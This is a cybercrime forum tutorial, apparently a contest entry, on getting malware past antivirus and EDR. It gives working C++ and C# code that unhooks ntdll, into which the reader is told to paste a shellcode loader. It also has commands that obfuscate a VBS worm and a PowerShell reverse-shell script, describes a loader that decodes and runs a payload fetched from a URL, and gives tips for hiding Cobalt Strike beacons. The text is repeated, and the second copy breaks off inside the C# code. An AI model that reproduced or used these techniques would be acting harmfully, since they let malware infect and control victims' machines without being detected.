D2
Администратор
- Регистрация
- 19 Фев 2025
- Сообщения
- 4,380
- Реакции
- 0
Hello everyone,
I'm seeing that some guys are complaining about the BTC price and maybe some guys have decided not to join the contest because of that. In my point of view, I think we should show some respect for the admin and the sponsor for their efforts, time and money they dedicate to make this forum a better place.
Let's get into the tutorial
Abstract:
In this tutorial, you will see how easy it is to bypass the antiviruses and their EDRs techniques and produce clean version of your malware either beacon payload, metasploit payload, RAT, botnet …etc. I will explain how antiviruses work and how to bypass their detections whether signature detection or EDR detection and make you ready to create your own encryption tools and bypassing techniques.
Introduction:
Most of attackers give up when they know that the target machine has an antivirus and some others give up when they remember the EDR (Endpoint Detection and Response) protection. However, when it comes to reality, antiviruses are just empty threats and depending on them for security purposes is a huge mistake because bypassing them is one of the easiest things when you understand their logic.
I am going to explain the detection in simple words and how we can bypass them in both scripting languages like (vbs and powershell) and programming languages like c#, for both Signature detection and EDR detection as well.
I will start with the EDR detection and how to bypass it, because it think it is necessary to begin with.
EDR detection:
EDR detection is the new technique that the antiviruses vendors have been bragging with. So what is ?
Simply, EDR is the mechanism that the antiviruses use to detect malicious code running the memory. So how does it work?
Antiviruses have made a list of Windows APIs as dangerous APIs, which can be used in shellcode loaders such as OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread and many more.
When an a process call or declare using PInvoke one of these APIs which located in the kernel32.dll or ntdll.dll modules, the antivirus will inject the process with dll files and manipulate these APIs (What known as userland hooking) to act like man in the middle and scan the code. If the code is clean, the antivirus will allow your process to continue its work. Actually, it's not that simple but I wanted to make short because I notice from my previous post Banking, money transfer company hacking, and bypassing Sophos firewall (with hards rules) and the IPS/IDS systems that some of you haven't read it cause it's a lot and complicated.
So, to bypass this kind of detection you have to avoid declaring them using PInvoke and call them in memory or by using syscalls ("Not explain here cause they need some more explanation"), DInvoke or by making unhooking the hook that the antivirus made to the process or by many advanced techniques, which I will explain them, if this tutorial go solid for you guys.
Unhook the hook:
As I mentioned, the antivirus inject the process with dll files and manipulate the APIs which is hooking the APIs to act like man in the middle, all what we have to do to bypass it, is to ruin the antivirus work and that can be done by loading a new version of these APIs functions from a new fresh version of kernel32 or ntdll.dll files from the desk.
Simply the idea of this method is to load a fresh version of the dll module whether it's kernel32.dll, kernelbase.dll ,user32.dll,ntdll.dll …etc and replace the old section .text , that running on the process with the new one which has been taken from the fresh version of the dll module which loaded from the desk. If you are interested in reading more about it, you can find it here from the author.
This is the implementation of it using c++
C++: Скопировать в буфер обмена
as you can see from the previous code, After cleaning the memory the hooked section, we can do pretty much anything without even worrying about the EDR detect.
The previous code is not harmful because there is not execution of a shellcode and we will not be using c++ , we will use the c# version which will be much easier. There is a source code for use in github, you can download it from here I have made some addtion for you to make the use for those who don't know how to use it much easier, just replace ShellcodeBytes array with your shellcode, wheither cobalt strike beacon or metasploit or whatever.
C#: Скопировать в буфер обмена
run it, and enjoy your clean.
That was easy. Now let's move to what much more easier, Signature detection
Signature Detection:
Simple without making it complicated, Signature detection depends on some values on the malware for example the offset of a specific function in the code or functions or even a variable name. All in all, it is a static detection, it means it detect based in some values on the malware, and we can know this kind of detection when a file touches the hard disk of the machine, if the antivirus give an alarm that means that the file has some values that the antivirus flagged as dangerous.
Bypassing Signature (Static) detection:
This kind of detection can be bypassed with many ways like changing these flagged values with hex (I don't like this technique) or by loading the malware in the memory and that's the best way to bypass the static detection and to make it much more harder for the antivirus we can encrypt the malware with one of the encryption algorithms like aes, des, xor ..etc.
Encrypting or Obfuscating malwares that have been written in scripting languages like vbs, powershell, and many more like php, perl, python is pretty simple cause these scripting languages have functions that help us execute a scripting code while the main script is running which is like running a binary or shellcode in memory in languages like c,c++,c# or any other language that support such activity, so to bypass such detection all what we need to do is to make the malware code is malformed so the antivirus can understand it while it is in the desk after that de-obfuscate it and run it in run time. Here are some examples of such functions:
Eval -> php,perl
Execute -> vbs
Iex -> powershell ..etc
If you have a specific language you can google it to find what function supports execute codes in run time
Obfuscate vbs scripts:
I think many of you will like this part because all of us use vbs scripts in ms office macro attacks like word excel.
For those who don't know anything thing of this kind of attacks, check the following url https://www.wolfandco.com/resources/insights/anatomy-of-an-office-macro-attack/
As I mentioned in the Signature detection we need to obfuscate the content of the script and make it ambiguous for the antivirus. I have create a simple python code that does the whole work for us and it's a gift for XSS.IS members and especially for the admin and the sponsor , you can find the tool in the attachments. The tool supports obfuscating using five techniques
[*] Octal
[*] ShortOctal
[*] Hex
[*] Letters
[*] Chars
Execute the following command
python vbs_obfuscator.py –h
As an example I will encrypt a vbs worm, I think some of you are familiar with. Let's see the result before and after the obfuscating.
Now let's execute the following command:
vbs_obfuscator.py -f worm.vbs -t octal -nl -o encrypted_worm.vbs
Now let's scan the output
clean, not detection found by any antivirus.
Let's explain the command args of the tool that I created.
-f : the malware to be obfuscated
-t : the technique to use to obfuscate the malware, use can use -l to get the list of the technique available in the tool
-o : the output file name.
-nl: create new lines (\n) after eache line. If you are going to use this arg, the file size will be increased.
Now let's see how does the output file looks like:
As the figure shows, the malware has been completely obfuscated compared to the original one (I have attached the original worm, so you can check and try it yourself).
By obfuscating the script code I could bypass all the static detections of the all antiviruses, the tool will produce clean version of your malware each time you run it. Now you can use this tool with attacks that depends on vbs codes like ms macro or any other attacks. Try it by yourself
Obfuscate powershell scripts:
Powershell is pentesters' favorite language, many github repos provide powershell script obfuscation, and here are some of them:
https://github.com/danielbohannon/Invoke-Obfuscation
https://github.com/RythmStick/AMSITrigger
https://github.com/tokyoneon/Chimera
I will explain the Chimera
Installing the tools is pretty forward
git clone https://github.com/tokyoneon/chimera
chmod +x chimera.sh; ./chimera.sh –help
the tool comes with plenty of examples you can run the command
cat USAGE.md
and you will see many examples and their explanations. I will run the example that the author of the tool has provided with the tool because he tried the tool on Chinese's favorite backdoor and mine actually
the script is Invoke-PowerShellTcp.ps1, which will provide us with an interactive powershell shell, the result of it before scanning in virustotal.com can be found on this link
https://www.virustotal.com/gui/file/b33ee9d0667628067479d4a4f7a998ad14786ff1bf9d66db5942ae727b12426c
the file has a already scanned by thousands and it's a well known to antiviruses. So now let's encrypt it and scan the result again.
Basic usage is
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,invoke-expression,out-string,write-error -j -g -k -r –p
The tool will provide us with a file in the /tmp path -> /tmp/chimera.ps1
Let's scan it and see the results
https://www.virustotal.com/gui/file...7be196e7046e587c0defb6bef91a2dacfab?nocache=1
By executing an basic command, we could bypass almost all antiviruses, that's really incredible, Sophos is a stupid antivirus I could bypass it by deleting the comments from the files that the tool has provided us with, execute the following command:
sed -i "/#/d" /tmp/chimera.ps1
and scan the file again you will see that
We could kick Sophos off but another antivirus appeared. Anyway, we can increase the level of obfuscating and we can manipulate the values of the tool, I will leave that for you because it's pretty easy, all what you have to do it to read the github repo of the tool.
Obfuscating powershell script manually:
Now I will explain, how can we encrypt or obfuscate powershell manually, for those who sent me private messages asking me to explain to them how to encrypt cobalt strike beacon, you can use thise technquie to encrypt it. Before I start, I want to mention that we can use c# and vb.net codes to encrypt or obfuscate the powershell code and invoke shellcode and c# malware bytes in memory and kick AMSI and windows defender so easily, for now I will show you how we can encrypt powershell scripts with few lines and the result is wounderfall. I will use xor encryption technique with master key to encrypt powershell backdoor, encode the output with base64, then make the bs64 data malformed. Let's open powershell and execute the following commands
Bash: Скопировать в буфер обмена
The output result
Код: Скопировать в буфер обмена
As you can see the output is a random data, you can check it youself, I promise you it's CLEAN.
As I told you CLEAN, no detection has found.
Loading it into the powershell an execute it is pretty simple. All what we have to do is to reverse everything
Load -> XOR -> base64_decode -> invoke
we can load the file from url and the following code is all what we need
Bash: Скопировать в буфер обмена
replace http://127.0.0.1/1/bs64.bs64 with your bs64 url
replace NUM with the same number used in the encryption
and run it in powershell. You can also encode it which will make it much easy. to encode it execute the following command in powershell
Bash: Скопировать в буфер обмена
now take the output and remove any new lines and execute it
Код: Скопировать в буфер обмена
you can hide the windows as well using the -w arg.
We can use the same technique with c#/VB.Net malwares and Trojans. However, there are somethings to understand:
1. Remove the feature of PE Injection, or browser injection to avoid EDRs detection.
2. Remove add reg key cause it will detect such activity.
Then get the bytes of the file with System.IO.File.ReadAllBytes() -> encode it bs64 -> create a url for it
the powershell loader will be something like this
Код: Скопировать в буфер обмена
You can modify the powershell loading command and encode it as well like we did with the previous example, I'm not going to repeat the same moves. and have fun.
As you can see antiviruses are a peace of shit and there are looooooots of way to bypass them and their techniques in detection, maybe in the future I will explain more stuff and private things and loaders like the loader that has been used in bazarloader and the technique that Revil Randomware has been using to bypass the detection and many cool stuff.
What more ?
when I decoded cobalt strike powershell beacon I noticed that I depends on calling the functions that I talked about in the Bypassing EDR section manually and at runtime, which means that when you encrypt the powershell beacon it should bypass the edr of almost every antivirus that relays on such technique. BUT, Cobalt strike beacon decryption key has been exposed and I don't recommand you to use the same keys, which means that even if you bypass the static and edr the stager will be detected, as will as the communication between the victim and the C2 team server will be detected, in return the beacon will be detected.
So how can we solve such problem? There are many ways but I will give you three tips which will really help you while encryption
First, use your own encryption keys while using cobalt strike, don't use the default keys.
Second, always try to use stageless payloads, so you can avoid detection while receiving the whole payload in chuncks
Third, try to use HTTPs beacon when possible with a custom TLS ssl cert. You can use metasploit auxiliary/gather/impersonate_ssl
I think that's it for today.
I didn't want to make it a long tutorial, but I have seen some members complaining that the tutorial is not long enough, so I asked the admin to grant me some privileges to be able to update the content.
In the end, I want to thank the admin and the sponsor for their effort and no matter what happened to the BTC I am really grateful for the chance to join the contest.
I'm seeing that some guys are complaining about the BTC price and maybe some guys have decided not to join the contest because of that. In my point of view, I think we should show some respect for the admin and the sponsor for their efforts, time and money they dedicate to make this forum a better place.
Let's get into the tutorial
Abstract:
In this tutorial, you will see how easy it is to bypass the antiviruses and their EDRs techniques and produce clean version of your malware either beacon payload, metasploit payload, RAT, botnet …etc. I will explain how antiviruses work and how to bypass their detections whether signature detection or EDR detection and make you ready to create your own encryption tools and bypassing techniques.
Introduction:
Most of attackers give up when they know that the target machine has an antivirus and some others give up when they remember the EDR (Endpoint Detection and Response) protection. However, when it comes to reality, antiviruses are just empty threats and depending on them for security purposes is a huge mistake because bypassing them is one of the easiest things when you understand their logic.
I am going to explain the detection in simple words and how we can bypass them in both scripting languages like (vbs and powershell) and programming languages like c#, for both Signature detection and EDR detection as well.
I will start with the EDR detection and how to bypass it, because it think it is necessary to begin with.
EDR detection:
EDR detection is the new technique that the antiviruses vendors have been bragging with. So what is ?
Simply, EDR is the mechanism that the antiviruses use to detect malicious code running the memory. So how does it work?
Antiviruses have made a list of Windows APIs as dangerous APIs, which can be used in shellcode loaders such as OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread and many more.
When an a process call or declare using PInvoke one of these APIs which located in the kernel32.dll or ntdll.dll modules, the antivirus will inject the process with dll files and manipulate these APIs (What known as userland hooking) to act like man in the middle and scan the code. If the code is clean, the antivirus will allow your process to continue its work. Actually, it's not that simple but I wanted to make short because I notice from my previous post Banking, money transfer company hacking, and bypassing Sophos firewall (with hards rules) and the IPS/IDS systems that some of you haven't read it cause it's a lot and complicated.
So, to bypass this kind of detection you have to avoid declaring them using PInvoke and call them in memory or by using syscalls ("Not explain here cause they need some more explanation"), DInvoke or by making unhooking the hook that the antivirus made to the process or by many advanced techniques, which I will explain them, if this tutorial go solid for you guys.
Unhook the hook:
As I mentioned, the antivirus inject the process with dll files and manipulate the APIs which is hooking the APIs to act like man in the middle, all what we have to do to bypass it, is to ruin the antivirus work and that can be done by loading a new version of these APIs functions from a new fresh version of kernel32 or ntdll.dll files from the desk.
Simply the idea of this method is to load a fresh version of the dll module whether it's kernel32.dll, kernelbase.dll ,user32.dll,ntdll.dll …etc and replace the old section .text , that running on the process with the new one which has been taken from the fresh version of the dll module which loaded from the desk. If you are interested in reading more about it, you can find it here from the author.
This is the implementation of it using c++
C++: Скопировать в буфер обмена
Код:
#include "pch.h"
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <psapi.h>
int main()
{
HANDLE process = GetCurrentProcess();
MODULEINFO mi = {};
HMODULE ntdllModule = GetModuleHandleA("ntdll.dll");
GetModuleInformation(process, ntdllModule, &mi, sizeof(mi));
LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);
PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);
for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
DWORD oldProtection = 0;
bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
}
}
CloseHandle(process);
CloseHandle(ntdllFile);
CloseHandle(ntdllMapping);
FreeLibrary(ntdllModule);
return 0;
}as you can see from the previous code, After cleaning the memory the hooked section, we can do pretty much anything without even worrying about the EDR detect.
The previous code is not harmful because there is not execution of a shellcode and we will not be using c++ , we will use the c# version which will be much easier. There is a source code for use in github, you can download it from here I have made some addtion for you to make the use for those who don't know how to use it much easier, just replace ShellcodeBytes array with your shellcode, wheither cobalt strike beacon or metasploit or whatever.
C#: Скопировать в буфер обмена
Код:
using System;
using System.Text;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Management;
namespace UnhookDLl
{
class DllUnhook
{
public const short FILE_ATTRIBUTE_NORMAL = 0x80;
public const short INVALID_HANDLE_VALUE = -1;
public const uint GENERIC_READ = 0x80000000;
public const uint GENERIC_WRITE = 0x40000000;
public const uint CREATE_NEW = 1;
public const uint CREATE_ALWAYS = 2;
public const uint OPEN_EXISTING = 3;
public const uint FILE_SHARE_READ = 0x00000001;
public enum SubSystemType : ushort
{
IMAGE_SUBSYSTEM_UNKNOWN = 0,
IMAGE_SUBSYSTEM_NATIVE = 1,
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2,
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3,
IMAGE_SUBSYSTEM_POSIX_CUI = 7,
IMAGE_SUBSYSTEM_WINDOWS_CE_GUI = 9,
IMAGE_SUBSYSTEM_EFI_APPLICATION = 10,
IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER = 11,
IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER = 12,
IMAGE_SUBSYSTEM_EFI_ROM = 13,
IMAGE_SUBSYSTEM_XBOX = 14
}
public enum DllCharacteristicsType : ushort
{
RES_0 = 0x0001,
RES_1 = 0x0002,
RES_2 = 0x0004,
RES_3 = 0x0008,
IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE = 0x0040,
IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY = 0x0080,
IMAGE_DLL_CHARACTERISTICS_NX_COMPAT = 0x0100,
IMAGE_DLLCHARACTERISTICS_NO_ISOLATION = 0x0200,
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400,
IMAGE_DLLCHARACTERISTICS_NO_BIND = 0x0800,
RES_4 = 0x1000,
IMAGE_DLLCHARACTERISTICS_WDM_DRIVER = 0x2000,
IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE = 0x8000
}
public enum MagicType : ushort
{
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10b,
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20b
}
[Flags]
public enum FileMapAccess : uint
{
FileMapCopy = 0x0001,
FileMapWrite = 0x0002,
FileMapRead = 0x0004,
FileMapAllAccess = 0x001f,
FileMapExecute = 0x0020,
}
[Flags]
public enum FileMapProtection : uint
{
PageReadonly = 0x02,
PageReadWrite = 0x04,
PageWriteCopy = 0x08,
PageExecuteRead = 0x20,
PageExecuteReadWrite = 0x40,
SectionCommit = 0x8000000,
SectionImage = 0x1000000,
SectionNoCache = 0x10000000,
SectionReserve = 0x4000000,
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_DATA_DIRECTORY
{
public UInt32 VirtualAddress;
public UInt32 Size;
}
[StructLayout(LayoutKind.Explicit)]
public struct IMAGE_OPTIONAL_HEADER64
{
[FieldOffset(0)]
public MagicType Magic;
[FieldOffset(2)]
public byte MajorLinkerVersion;
[FieldOffset(3)]
public byte MinorLinkerVersion;
[FieldOffset(4)]
public uint SizeOfCode;
[FieldOffset(8)]
public uint SizeOfInitializedData;
[FieldOffset(12)]
public uint SizeOfUninitializedData;
[FieldOffset(16)]
public uint AddressOfEntryPoint;
[FieldOffset(20)]
public uint BaseOfCode;
[FieldOffset(24)]
public ulong ImageBase;
[FieldOffset(32)]
public uint SectionAlignment;
[FieldOffset(36)]
public uint FileAlignment;
[FieldOffset(40)]
public ushort MajorOperatingSystemVersion;
[FieldOffset(42)]
public ushort MinorOperatingSystemVersion;
[FieldOffset(44)]
public ushort MajorImageVersion;
[FieldOffset(46)]
public ushort MinorImageVersion;
[FieldOffset(48)]
public ushort MajorSubsystemVersion;
[FieldOffset(50)]
public ushort MinorSubsystemVersion;
[FieldOffset(52)]
public uint Win32VersionValue;
[FieldOffset(56)]
public uint SizeOfImage;
[FieldOffset(60)]
public uint SizeOfHeaders;
[FieldOffset(64)]
public uint CheckSum;
[FieldOffset(68)]
public SubSystemType Subsystem;
[FieldOffset(70)]
public DllCharacteristicsType DllCharacteristics;
[FieldOffset(72)]
public ulong SizeOfStackReserve;
[FieldOffset(80)]
public ulong SizeOfStackCommit;
[FieldOffset(88)]
public ulong SizeOfHeapReserve;
[FieldOffset(96)]
public ulong SizeOfHeapCommit;
[FieldOffset(104)]
public uint LoaderFlags;
[FieldOffset(108)]
public uint NumberOfRvaAndSizes;
[FieldOffset(112)]
public IMAGE_DATA_DIRECTORY ExportTable;
[FieldOffset(120)]
public IMAGE_DATA_DIRECTORY ImportTable;
[FieldOffset(128)]
public IMAGE_DATA_DIRECTORY ResourceTable;
[FieldOffset(136)]
public IMAGE_DATA_DIRECTORY ExceptionTable;
[FieldOffset(144)]
public IMAGE_DATA_DIRECTORY CertificateTable;
[FieldOffset(152)]
public IMAGE_DATA_DIRECTORY BaseRelocationTable;
[FieldOffset(160)]
public IMAGE_DATA_DIRECTORY Debug;
[FieldOffset(168)]
public IMAGE_DATA_DIRECTORY Architecture;
[FieldOffset(176)]
public IMAGE_DATA_DIRECTORY GlobalPtr;
[FieldOffset(184)]
public IMAGE_DATA_DIRECTORY TLSTable;
[FieldOffset(192)]
public IMAGE_DATA_DIRECTORY LoadConfigTable;
[FieldOffset(200)]
public IMAGE_DATA_DIRECTORY BoundImport;
[FieldOffset(208)]
public IMAGE_DATA_DIRECTORY IAT;
[FieldOffset(216)]
public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
[FieldOffset(224)]
public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
[FieldOffset(232)]
public IMAGE_DATA_DIRECTORY Reserved;
}
[StructLayout(LayoutKind.Explicit, Size = 20)]
public struct IMAGE_FILE_HEADER
{
[FieldOffset(0)]
public UInt16 Machine;
[FieldOffset(2)]
public UInt16 NumberOfSections;
[FieldOffset(4)]
public UInt32 TimeDateStamp;
[FieldOffset(8)]
public UInt32 PointerToSymbolTable;
[FieldOffset(12)]
public UInt32 NumberOfSymbols;
[FieldOffset(16)]
public UInt16 SizeOfOptionalHeader;
[FieldOffset(18)]
public UInt16 Characteristics;
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_DOS_HEADER
{
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)]
public char[] e_magic; // Magic number
public UInt16 e_cblp; // Bytes on last page of file
public UInt16 e_cp; // Pages in file
public UInt16 e_crlc; // Relocations
public UInt16 e_cparhdr; // Size of header in paragraphs
public UInt16 e_minalloc; // Minimum extra paragraphs needed
public UInt16 e_maxalloc; // Maximum extra paragraphs needed
public UInt16 e_ss; // Initial (relative) SS value
public UInt16 e_sp; // Initial SP value
public UInt16 e_csum; // Checksum
public UInt16 e_ip; // Initial IP value
public UInt16 e_cs; // Initial (relative) CS value
public UInt16 e_lfarlc; // File address of relocation table
public UInt16 e_ovno; // Overlay number
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public UInt16[] e_res1; // Reserved words
public UInt16 e_oemid; // OEM identifier (for e_oeminfo)
public UInt16 e_oeminfo; // OEM information; e_oemid specific
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public UInt16[] e_res2; // Reserved words
public Int32 e_lfanew; // File address of new exe header
private string _e_magic
{
get { return new string(e_magic); }
}
public bool isValid
{
get { return _e_magic == "MZ"; }
}
}
[StructLayout(LayoutKind.Explicit)]
public struct IMAGE_NT_HEADERS64
{
[FieldOffset(0)]
public int Signature;
[FieldOffset(4)]
public IMAGE_FILE_HEADER FileHeader;
[FieldOffset(24)]
public IMAGE_OPTIONAL_HEADER64 OptionalHeader;
}
[StructLayout(LayoutKind.Sequential)]
public struct MODULEINFO
{
public IntPtr lpBaseOfDll;
public uint SizeOfImage;
public IntPtr EntryPoint;
}
[StructLayout(LayoutKind.Explicit)]
public struct IMAGE_SECTION_HEADER
{
[FieldOffset(0)]
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public char[] Name;
[FieldOffset(8)]
public UInt32 VirtualSize;
[FieldOffset(12)]
public UInt32 VirtualAddress;
[FieldOffset(16)]
public UInt32 SizeOfRawData;
[FieldOffset(20)]
public UInt32 PointerToRawData;
[FieldOffset(24)]
public UInt32 PointerToRelocations;
[FieldOffset(28)]
public UInt32 PointerToLinenumbers;
[FieldOffset(32)]
public UInt16 NumberOfRelocations;
[FieldOffset(34)]
public UInt16 NumberOfLinenumbers;
[FieldOffset(36)]
public DataSectionFlags Characteristics;
public string Section
{
get { return new string(Name); }
}
}
[Flags]
public enum DataSectionFlags : uint
{
/// <summary>
/// Reserved for future use.
/// </summary>
TypeReg = 0x00000000,
/// <summary>
/// Reserved for future use.
/// </summary>
TypeDsect = 0x00000001,
/// <summary>
/// Reserved for future use.
/// </summary>
TypeNoLoad = 0x00000002,
/// <summary>
/// Reserved for future use.
/// </summary>
TypeGroup = 0x00000004,
/// <summary>
/// The section should not be padded to the next boundary. This flag is obsolete and is replaced by IMAGE_SCN_ALIGN_1BYTES. This is valid only for object files.
/// </summary>
TypeNoPadded = 0x00000008,
/// <summary>
/// Reserved for future use.
/// </summary>
TypeCopy = 0x00000010,
/// <summary>
/// The section contains executable code.
/// </summary>
ContentCode = 0x00000020,
/// <summary>
/// The section contains initialized data.
/// </summary>
ContentInitializedData = 0x00000040,
/// <summary>
/// The section contains uninitialized data.
/// </summary>
ContentUninitializedData = 0x00000080,
/// <summary>
/// Reserved for future use.
/// </summary>
LinkOther = 0x00000100,
/// <summary>
/// The section contains comments or other information. The .drectve section has this type. This is valid for object files only.
/// </summary>
LinkInfo = 0x00000200,
/// <summary>
/// Reserved for future use.
/// </summary>
TypeOver = 0x00000400,
/// <summary>
/// The section will not become part of the image. This is valid only for object files.
/// </summary>
LinkRemove = 0x00000800,
/// <summary>
/// The section contains COMDAT data. For more information, see section 5.5.6, COMDAT Sections (Object Only). This is valid only for object files.
/// </summary>
LinkComDat = 0x00001000,
/// <summary>
/// Reset speculative exceptions handling bits in the TLB entries for this section.
/// </summary>
NoDeferSpecExceptions = 0x00004000,
/// <summary>
/// The section contains data referenced through the global pointer (GP).
/// </summary>
RelativeGP = 0x00008000,
/// <summary>
/// Reserved for future use.
/// </summary>
MemPurgeable = 0x00020000,
/// <summary>
/// Reserved for future use.
/// </summary>
Memory16Bit = 0x00020000,
/// <summary>
/// Reserved for future use.
/// </summary>
MemoryLocked = 0x00040000,
/// <summary>
/// Reserved for future use.
/// </summary>
MemoryPreload = 0x00080000,
/// <summary>
/// Align data on a 1-byte boundary. Valid only for object files.
/// </summary>
Align1Bytes = 0x00100000,
/// <summary>
/// Align data on a 2-byte boundary. Valid only for object files.
/// </summary>
Align2Bytes = 0x00200000,
/// <summary>
/// Align data on a 4-byte boundary. Valid only for object files.
/// </summary>
Align4Bytes = 0x00300000,
/// <summary>
/// Align data on an 8-byte boundary. Valid only for object files.
/// </summary>
Align8Bytes = 0x00400000,
/// <summary>
/// Align data on a 16-byte boundary. Valid only for object files.
/// </summary>
Align16Bytes = 0x00500000,
/// <summary>
/// Align data on a 32-byte boundary. Valid only for object files.
/// </summary>
Align32Bytes = 0x00600000,
/// <summary>
/// Align data on a 64-byte boundary. Valid only for object files.
/// </summary>
Align64Bytes = 0x00700000,
/// <summary>
/// Align data on a 128-byte boundary. Valid only for object files.
/// </summary>
Align128Bytes = 0x00800000,
/// <summary>
/// Align data on a 256-byte boundary. Valid only for object files.
/// </summary>
Align256Bytes = 0x00900000,
/// <summary>
/// Align data on a 512-byte boundary. Valid only for object files.
/// </summary>
Align512Bytes = 0x00A00000,
/// <summary>
/// Align data on a 1024-byte boundary. Valid only for object files.
/// </summary>
Align1024Bytes = 0x00B00000,
/// <summary>
/// Align data on a 2048-byte boundary. Valid only for object files.
/// </summary>
Align2048Bytes = 0x00C00000,
/// <summary>
/// Align data on a 4096-byte boundary. Valid only for object files.
/// </summary>
Align4096Bytes = 0x00D00000,
/// <summary>
/// Align data on an 8192-byte boundary. Valid only for object files.
/// </summary>
Align8192Bytes = 0x00E00000,
/// <summary>
/// The section contains extended relocations.
/// </summary>
LinkExtendedRelocationOverflow = 0x01000000,
/// <summary>
/// The section can be discarded as needed.
/// </summary>
MemoryDiscardable = 0x02000000,
/// <summary>
/// The section cannot be cached.
/// </summary>
MemoryNotCached = 0x04000000,
/// <summary>
/// The section is not pageable.
/// </summary>
MemoryNotPaged = 0x08000000,
/// <summary>
/// The section can be shared in memory.
/// </summary>
MemoryShared = 0x10000000,
/// <summary>
/// The section can be executed as code.
/// </summary>
MemoryExecute = 0x20000000,
/// <summary>
/// The section can be read.
/// </summary>
MemoryRead = 0x40000000,
/// <summary>
/// The section can be written to.
/// </summary>
MemoryWrite = 0x80000000
}
[Flags]
public enum ACCESS_MASK : uint
{
DELETE = 0x00010000,
READ_CONTROL = 0x00020000,
WRITE_DAC = 0x00040000,
WRITE_OWNER = 0x00080000,
SYNCHRONIZE = 0x00100000,
STANDARD_RIGHTS_REQUIRED = 0x000F0000,
STANDARD_RIGHTS_READ = 0x00020000,
STANDARD_RIGHTS_WRITE = 0x00020000,
STANDARD_RIGHTS_EXECUTE = 0x00020000,
STANDARD_RIGHTS_ALL = 0x001F0000,
SPECIFIC_RIGHTS_ALL = 0x0000FFF,
ACCESS_SYSTEM_SECURITY = 0x01000000,
MAXIMUM_ALLOWED = 0x02000000,
GENERIC_READ = 0x80000000,
GENERIC_WRITE = 0x40000000,
GENERIC_EXECUTE = 0x20000000,
GENERIC_ALL = 0x10000000,
DESKTOP_READOBJECTS = 0x00000001,
DESKTOP_CREATEWINDOW = 0x00000002,
DESKTOP_CREATEMENU = 0x00000004,
DESKTOP_HOOKCONTROL = 0x00000008,
DESKTOP_JOURNALRECORD = 0x00000010,
DESKTOP_JOURNALPLAYBACK = 0x00000020,
DESKTOP_ENUMERATE = 0x00000040,
DESKTOP_WRITEOBJECTS = 0x00000080,
DESKTOP_SWITCHDESKTOP = 0x00000100,
WINSTA_ENUMDESKTOPS = 0x00000001,
WINSTA_READATTRIBUTES = 0x00000002,
WINSTA_ACCESSCLIPBOARD = 0x00000004,
WINSTA_CREATEDESKTOP = 0x00000008,
WINSTA_WRITEATTRIBUTES = 0x00000010,
WINSTA_ACCESSGLOBALATOMS = 0x00000020,
WINSTA_EXITWINDOWS = 0x00000040,
WINSTA_ENUMERATE = 0x00000100,
WINSTA_READSCREEN = 0x00000200,
WINSTA_ALL_ACCESS = 0x0000037F,
SECTION_ALL_ACCESS = 0x10000000,
SECTION_QUERY = 0x0001,
SECTION_MAP_WRITE = 0x0002,
SECTION_MAP_READ = 0x0004,
SECTION_MAP_EXECUTE = 0x0008,
SECTION_EXTEND_SIZE = 0x0010
};
public enum NTSTATUS : uint
{
// Success
Success = 0x00000000,
Wait0 = 0x00000000,
Wait1 = 0x00000001,
Wait2 = 0x00000002,
Wait3 = 0x00000003,
Wait63 = 0x0000003f,
Abandoned = 0x00000080,
AbandonedWait0 = 0x00000080,
AbandonedWait1 = 0x00000081,
AbandonedWait2 = 0x00000082,
AbandonedWait3 = 0x00000083,
AbandonedWait63 = 0x000000bf,
